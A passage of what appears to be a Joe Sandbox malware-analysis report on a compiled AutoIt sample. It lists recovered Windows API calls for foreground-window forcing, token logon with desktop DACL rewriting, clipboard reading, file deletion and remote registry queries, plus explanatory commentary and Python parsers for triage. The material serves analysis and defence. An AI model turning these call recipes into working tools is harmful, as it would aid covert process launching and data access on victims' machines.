                                        • Instruction Fuzzy Hash: 1612C1B1600215ABEB249F68CC89FEE7BB8FF45710F104229F695DB2E1DBB49941CB50
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0008F998
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000CF474
                                        • IsIconic.USER32(00000000), ref: 000CF47D
                                        • ShowWindow.USER32(00000000,00000009), ref: 000CF48A
                                        • SetForegroundWindow.USER32(00000000), ref: 000CF494
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000CF4AA
                                        • GetCurrentThreadId.KERNEL32 ref: 000CF4B1
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000CF4BD
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000CF4CE
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000CF4D6
                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 000CF4DE
                                        • SetForegroundWindow.USER32(00000000), ref: 000CF4E1
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF4F6
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF501
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF50B
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF510
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF519
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF51E
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF528
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF52D
                                        • SetForegroundWindow.USER32(00000000), ref: 000CF530
                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 000CF557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: 58ac5f7b9c48de4d3657cbc1d2f10552dcc3b72fd020c7cf6107dc01ed7bf6d5
                                        • Instruction ID: 48235b689c715e16b59526cd5d3ae1417bc90e68dbe19893c0f394b7b92c5837
                                        • Opcode Fuzzy Hash: 58ac5f7b9c48de4d3657cbc1d2f10552dcc3b72fd020c7cf6107dc01ed7bf6d5
                                        • Instruction Fuzzy Hash: 51315E71B40218BBEB206BB55C4AFBF7EADEB44B50F10012AFB40E61D1C6F15D40AEA1
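The function above is the textbook way around the foreground-window lock: Windows only lets SetForegroundWindow succeed for a process that owns, or shares input state with, the thread that last received input, so the code attaches its input queue to the taskbar (Shell_TrayWnd) and foreground threads with AttachThreadInput, taps the Alt key (keybd_event with VK 0x12 = VK_MENU) to satisfy that rule, calls SetForegroundWindow, then detaches. Two caveats for triage: this is the same approach AutoIt-style automation uses to activate windows, and the report already identifies the binary as a compiled AutoIt script, so the helper is most likely interpreter runtime shipped with every such binary rather than logic the operator wrote; and the argument constants in these listings are best-effort recoveries by the sandbox. The following Python is an added example, not part of the Joe Sandbox report or of the sample. It parses the 'APIs' lines copied from this record and checks that the attach, Alt tap and SetForegroundWindow happen in that order; the constants VK_MENU and SW_RESTORE are Win32 values, not values taken from the page.

```python
import re

# Win32 constants referenced by the sequence above (winuser.h, not from the report)
VK_MENU = 0x12      # keybd_event(0x12, ...) taps the Alt key
SW_RESTORE = 9      # ShowWindow(hwnd, 9) restores a minimized window

# Constructed input: the 'APIs' lines of the function above, copied from this report
TRACE = """
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0008F998
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000CF474
• IsIconic.USER32(00000000), ref: 000CF47D
• ShowWindow.USER32(00000000,00000009), ref: 000CF48A
• SetForegroundWindow.USER32(00000000), ref: 000CF494
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000CF4AA
• GetCurrentThreadId.KERNEL32 ref: 000CF4B1
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000CF4BD
• AttachThreadInput.USER32(?,00000000,00000001), ref: 000CF4CE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 000CF4D6
• AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 000CF4DE
• SetForegroundWindow.USER32(00000000), ref: 000CF4E1
• MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF4F6
• keybd_event.USER32(00000012,00000000), ref: 000CF501
• MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF50B
• keybd_event.USER32(00000012,00000000), ref: 000CF510
• MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF519
• keybd_event.USER32(00000012,00000000), ref: 000CF51E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF528
• keybd_event.USER32(00000012,00000000), ref: 000CF52D
• SetForegroundWindow.USER32(00000000), ref: 000CF530
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 000CF557
"""

# One report line: Api.Module(arg,arg,...), ref: ADDRESS   (the argument list is optional)
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


def parse_trace(text):
    """Turn report lines into (api, module, args, ref) tuples; lines that do not match are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            calls.append((m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def hex_arg(arg):
    """Arguments are hex DWORDs, '?' when the sandbox could not recover them, or a literal string.
    Returns None for anything that is not a hex number."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def detect_foreground_force(calls):
    """Collect evidence for the AttachThreadInput + Alt-tap foreground trick and check its order:
    at least one attach (fAttach == 1) before the first VK_MENU keybd_event, and a
    SetForegroundWindow after that tap."""
    attach = [i for i, c in enumerate(calls)
              if c[0] == "AttachThreadInput" and c[2][2:3] == ["00000001"]]
    alt_taps = [i for i, c in enumerate(calls)
                if c[0] == "keybd_event" and c[2] and hex_arg(c[2][0]) == VK_MENU]
    foreground = [i for i, c in enumerate(calls) if c[0] == "SetForegroundWindow"]
    taskbar = any(c[0] == "FindWindowW" and c[2][:1] == ["Shell_TrayWnd"] for c in calls)
    ordered = bool(attach and alt_taps and foreground) and attach[0] < alt_taps[0] < foreground[-1]
    return {
        "targets_taskbar": taskbar,
        "attach_calls": len(attach),
        "alt_taps": len(alt_taps),
        "set_foreground_calls": len(foreground),
        "matches": ordered,
    }


if __name__ == "__main__":
    print(detect_foreground_force(parse_trace(TRACE)))
```

The parser only relies on the `Api.Module(args), ref: address` shape these listings share, so the same function can be pointed at any other record on this page; `hex_arg` treats `?` and string literals such as `Shell_TrayWnd` as non-numeric rather than guessing.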
                                        APIs
                                          • Part of subcall function 000D16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000D170D
                                          • Part of subcall function 000D16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000D173A
                                          • Part of subcall function 000D16C3: GetLastError.KERNEL32 ref: 000D174A
                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 000D1286
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000D12A8
                                        • CloseHandle.KERNEL32(?), ref: 000D12B9
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000D12D1
                                        • GetProcessWindowStation.USER32 ref: 000D12EA
                                        • SetProcessWindowStation.USER32(00000000), ref: 000D12F4
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000D1310
                                          • Part of subcall function 000D10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000D11FC), ref: 000D10D4
                                          • Part of subcall function 000D10BF: CloseHandle.KERNEL32(?,?,000D11FC), ref: 000D10E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                        • String ID: $default$winsta0
                                        • API String ID: 22674027-1027155976
                                        • Opcode ID: 9b9a29656ed1b1ed91b5ced66e4371b809c9a8c09de74bf503d8f2a977526dce
                                        • Instruction ID: 592216ce1a2079d7808628847c3b068c9766408f027f08fb5d1dfd24ca767648
                                        • Opcode Fuzzy Hash: 9b9a29656ed1b1ed91b5ced66e4371b809c9a8c09de74bf503d8f2a977526dce
                                        • Instruction Fuzzy Hash: 67816D71900309BBDF219FA4DC49FEE7BB9EF08704F14412AF911A62A1DBB18995CF61
                                        APIs
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000D1114
                                          • Part of subcall function 000D10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1120
                                          • Part of subcall function 000D10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D112F
                                          • Part of subcall function 000D10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1136
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000D114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000D0BCC
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000D0C00
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0C17
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 000D0C51
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000D0C6D
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0C84
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000D0C8C
                                        • HeapAlloc.KERNEL32(00000000), ref: 000D0C93
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000D0CB4
                                        • CopySid.ADVAPI32(00000000), ref: 000D0CBB
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000D0CEA
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000D0D0C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000D0D1E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0D45
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D4C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0D55
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D5C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0D65
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D6C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000D0D78
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D7F
                                          • Part of subcall function 000D1193: GetProcessHeap.KERNEL32(00000008,000D0BB1,?,00000000,?,000D0BB1,?), ref: 000D11A1
                                          • Part of subcall function 000D1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,000D0BB1,?), ref: 000D11A8
                                          • Part of subcall function 000D1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000D0BB1,?), ref: 000D11B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: c339af6b90ab8f3884ae3dba7a42f8244379e45e4ce9e346e6ea9cb39b94aed8
                                        • Instruction ID: 85aac158a79e674799858b709baad6d55624594bf0a63f06b97866d242e0b4d3
                                        • Opcode Fuzzy Hash: c339af6b90ab8f3884ae3dba7a42f8244379e45e4ce9e346e6ea9cb39b94aed8
                                        • Instruction Fuzzy Hash: 55714A7690020AABDF509FA4DC48BEEBBB9BF05300F144616F958A7291D7B1A945CFB0
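The two records above belong together and are the documented recipe for launching an interactive process under another account: LogonUserW obtains a token, DuplicateTokenEx(..., 2, 1, ...) makes a primary token (2 = SecurityImpersonation, 1 = TokenPrimary), OpenWindowStationW("winsta0", 0x60000) and OpenDesktopW("default", 0x60081) open the interactive window station and desktop, and the second function reads each object's DACL (GetUserObjectSecurity with 4 = DACL_SECURITY_INFORMATION), appends ACEs with AddAce(acl, 2 = ACL_REVISION, 0xFFFFFFFF = MAXDWORD, i.e. append) and writes it back with SetUserObjectSecurity, so the new logon's SID can draw on the desktop. Reading intent from the access masks is the quick check: both opens request WRITE_DAC, which is only needed if the caller plans to edit the ACL. Note also that the trace shows 00000000 for LogonUserW's dwLogonType, which is not a documented logon type (LOGON32_LOGON_INTERACTIVE is 2), so treat the recovered constants as approximate. The Python below is an added example, not part of the Joe Sandbox report or the sample: it decodes an ACCESS_MASK against the right object-specific table and summarizes the two opens. All bit names and values are Win32 constants from winnt.h and winuser.h, not values taken from the page; the OPENS list is constructed from the trace above.

```python
# Generic access rights (winnt.h) and the object-specific rights for window stations
# and desktops (winuser.h). Win32 constants, not values from the report.
GENERIC_RIGHTS = {
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
    0x01000000: "ACCESS_SYSTEM_SECURITY",
    0x02000000: "MAXIMUM_ALLOWED",
    0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE",
    0x80000000: "GENERIC_READ",
}
WINSTA_RIGHTS = {
    0x0001: "WINSTA_ENUMDESKTOPS",
    0x0002: "WINSTA_READATTRIBUTES",
    0x0004: "WINSTA_ACCESSCLIPBOARD",
    0x0008: "WINSTA_CREATEDESKTOP",
    0x0010: "WINSTA_WRITEATTRIBUTES",
    0x0020: "WINSTA_ACCESSGLOBALATOMS",
    0x0040: "WINSTA_EXITWINDOWS",
    0x0100: "WINSTA_ENUMERATE",
    0x0200: "WINSTA_READSCREEN",
}
DESKTOP_RIGHTS = {
    0x0001: "DESKTOP_READOBJECTS",
    0x0002: "DESKTOP_CREATEWINDOW",
    0x0004: "DESKTOP_CREATEMENU",
    0x0008: "DESKTOP_HOOKCONTROL",
    0x0010: "DESKTOP_JOURNALRECORD",
    0x0020: "DESKTOP_JOURNALPLAYBACK",
    0x0040: "DESKTOP_ENUMERATE",
    0x0080: "DESKTOP_WRITEOBJECTS",
    0x0100: "DESKTOP_SWITCHDESKTOP",
}
WRITE_DAC = 0x00040000
DACL_SECURITY_INFORMATION = 0x4   # the 'si' argument of Get/SetUserObjectSecurity above
MAXDWORD = 0xFFFFFFFF             # AddAce dwStartingAceIndex: append after the existing ACEs
ACL_REVISION = 2                  # AddAce dwAceRevision above

# Constructed from the trace above: (api, object name, dwDesiredAccess)
OPENS = [
    ("OpenWindowStationW", "winsta0", 0x00060000),
    ("OpenDesktopW", "default", 0x00060081),
]


def decode_mask(mask, specific):
    """Name every set bit of a 32-bit ACCESS_MASK using the given object-specific table.
    Bits that neither table defines are kept as one hex remainder so nothing is silently dropped."""
    if not 0 <= mask <= 0xFFFFFFFF:
        raise ValueError("ACCESS_MASK is a 32-bit value")
    names, rest = [], mask
    for bit, name in sorted({**specific, **GENERIC_RIGHTS}.items()):
        if mask & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def summarize_opens(opens):
    """Decode each open with the table matching its object type and flag WRITE_DAC requests,
    which signal that the caller intends to rewrite the object's DACL (as the next function does)."""
    tables = {"OpenWindowStationW": WINSTA_RIGHTS, "OpenDesktopW": DESKTOP_RIGHTS}
    summary = []
    for api, obj, mask in opens:
        summary.append({
            "api": api,
            "object": obj,
            "rights": decode_mask(mask, tables[api]),
            "can_edit_dacl": bool(mask & WRITE_DAC),
        })
    return summary


if __name__ == "__main__":
    for entry in summarize_opens(OPENS):
        print(entry)
```

Using the wrong table is the usual mistake: decoding the desktop mask 0x60081 with the window-station table would label bit 0x1 as WINSTA_ENUMDESKTOPS and leave 0x80 unexplained, so `decode_mask` is keyed on the API that produced the handle.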
                                        APIs
                                        • OpenClipboard.USER32(0010CC08), ref: 000EEB29
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 000EEB37
                                        • GetClipboardData.USER32(0000000D), ref: 000EEB43
                                        • CloseClipboard.USER32 ref: 000EEB4F
                                        • GlobalLock.KERNEL32(00000000), ref: 000EEB87
                                        • CloseClipboard.USER32 ref: 000EEB91
                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 000EEBBC
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 000EEBC9
                                        • GetClipboardData.USER32(00000001), ref: 000EEBD1
                                        • GlobalLock.KERNEL32(00000000), ref: 000EEBE2
                                        • GlobalUnlock.KERNEL32(00000000,?), ref: 000EEC22
                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 000EEC38
                                        • GetClipboardData.USER32(0000000F), ref: 000EEC44
                                        • GlobalLock.KERNEL32(00000000), ref: 000EEC55
                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000EEC77
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000EEC94
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000EECD2
                                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 000EECF3
                                        • CountClipboardFormats.USER32 ref: 000EED14
                                        • CloseClipboard.USER32 ref: 000EED59
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                        • String ID:
                                        • API String ID: 420908878-0
                                        • Opcode ID: 8b398be0754b9bf963c9644e147ef14ef83e270baa91622f4d94433597883614
                                        • Instruction ID: d532a1e56ac16925500847aae04527de58cb6b081cd02a36af15c97a0fa4ebc0
                                        • Opcode Fuzzy Hash: 8b398be0754b9bf963c9644e147ef14ef83e270baa91622f4d94433597883614
                                        • Instruction Fuzzy Hash: C361F0342042859FD310EF25D884F6AB7E4AF84704F148619F49AA76A2DB71DD86CFA2
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000E69BE
                                        • FindClose.KERNEL32(00000000), ref: 000E6A12
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000E6A4E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000E6A75
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000E6AB2
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000E6ADF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                        • API String ID: 3830820486-3289030164
                                        • Opcode ID: c7e709946a1180b829edddd799ecce86f5f950a5c77971a794db317bf02d5695
                                        • Instruction ID: 21da3ec3c6802f58b55bc8cd4def28cd21001fb64cb79005efc9e55c19b9eb97
                                        • Opcode Fuzzy Hash: c7e709946a1180b829edddd799ecce86f5f950a5c77971a794db317bf02d5695
                                        • Instruction Fuzzy Hash: DBD15271908340AEC710EB64D882EAFB7ECBF98704F44491DF589D7192EB79DA44CB62
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000E9663
                                        • GetFileAttributesW.KERNEL32(?), ref: 000E96A1
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 000E96BB
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000E96D3
                                        • FindClose.KERNEL32(00000000), ref: 000E96DE
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000E96FA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E974A
                                        • SetCurrentDirectoryW.KERNEL32(00136B7C), ref: 000E9768
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000E9772
                                        • FindClose.KERNEL32(00000000), ref: 000E977F
                                        • FindClose.KERNEL32(00000000), ref: 000E978F
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: fa38e03025518202e500249f885f2f4ff9722444b8b8b3c70d6267b3296df259
                                        • Instruction ID: be62db34bd235717b1ac21749b548852d715079cc01b757d123701e98e21e19d
                                        • Opcode Fuzzy Hash: fa38e03025518202e500249f885f2f4ff9722444b8b8b3c70d6267b3296df259
                                        • Instruction Fuzzy Hash: 8C31F3326002597EDF24AFB6DC08ADE77ECAF09321F144166F884F2091DB74DD848E50
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000E97BE
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000E9819
                                        • FindClose.KERNEL32(00000000), ref: 000E9824
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000E9840
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E9890
                                        • SetCurrentDirectoryW.KERNEL32(00136B7C), ref: 000E98AE
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000E98B8
                                        • FindClose.KERNEL32(00000000), ref: 000E98C5
                                        • FindClose.KERNEL32(00000000), ref: 000E98D5
                                          • Part of subcall function 000DDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000DDB00
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 725aff71902fddf23cc4eb5f06f3ace7149650364359c35d54d099b0d9054b2a
                                        • Instruction ID: ab1320fae699fdc4c5d513a197180ab923fd39621a45dadd90aecb8108b29f94
                                        • Opcode Fuzzy Hash: 725aff71902fddf23cc4eb5f06f3ace7149650364359c35d54d099b0d9054b2a
                                        • Instruction Fuzzy Hash: 1031C1316002596EDF20AFB6ED48ADEB7ACAF06320F148155F890B21E1DF74DE858F60
                                        APIs
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FBF3E
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 000FBFA9
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FBFCD
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000FC02C
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000FC0E7
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000FC154
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000FC1E9
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 000FC23A
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000FC2E3
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000FC382
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FC38F
                                        Similarity
                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 3102970594-0
                                        • Opcode ID: 67e95932ebf66226940a86d3a3fee3b27424d9cd978f9b775f25ef756957994c
                                        • Instruction ID: 4e45f987a0e2af79e5bfb496c0cfd4456131da5f03bc0b782c764945b1ec01c6
                                        • Opcode Fuzzy Hash: 67e95932ebf66226940a86d3a3fee3b27424d9cd978f9b775f25ef756957994c
                                        • Instruction Fuzzy Hash: CA026C706042049FD754CF28C991E2ABBE5EF89308F18C49DF94ACB6A2DB31ED45DB91
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 000E8257
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E8267
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000E8273
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E8310
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8324
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8356
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000E838C
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8395
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        • Opcode ID: 3171552701263003676ca32dfecb7494f140d81dc08e0175f62770e207f2097b
                                        • Instruction ID: 8ae52b013d8b3af0e91c41def56390c18baf16163696cdaa43416452dcec1a74
                                        • Opcode Fuzzy Hash: 3171552701263003676ca32dfecb7494f140d81dc08e0175f62770e207f2097b
                                        • Instruction Fuzzy Hash: 45619B725043459FCB10EF60C840AAEB3E8FF89310F04892EF98D97252DB35EA45CB92
                                        APIs
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                          • Part of subcall function 000DE199: GetFileAttributesW.KERNEL32(?,000DCF95), ref: 000DE19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000DD122
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 000DD1DD
                                        • MoveFileW.KERNEL32(?,?), ref: 000DD1F0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 000DD20D
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000DD237
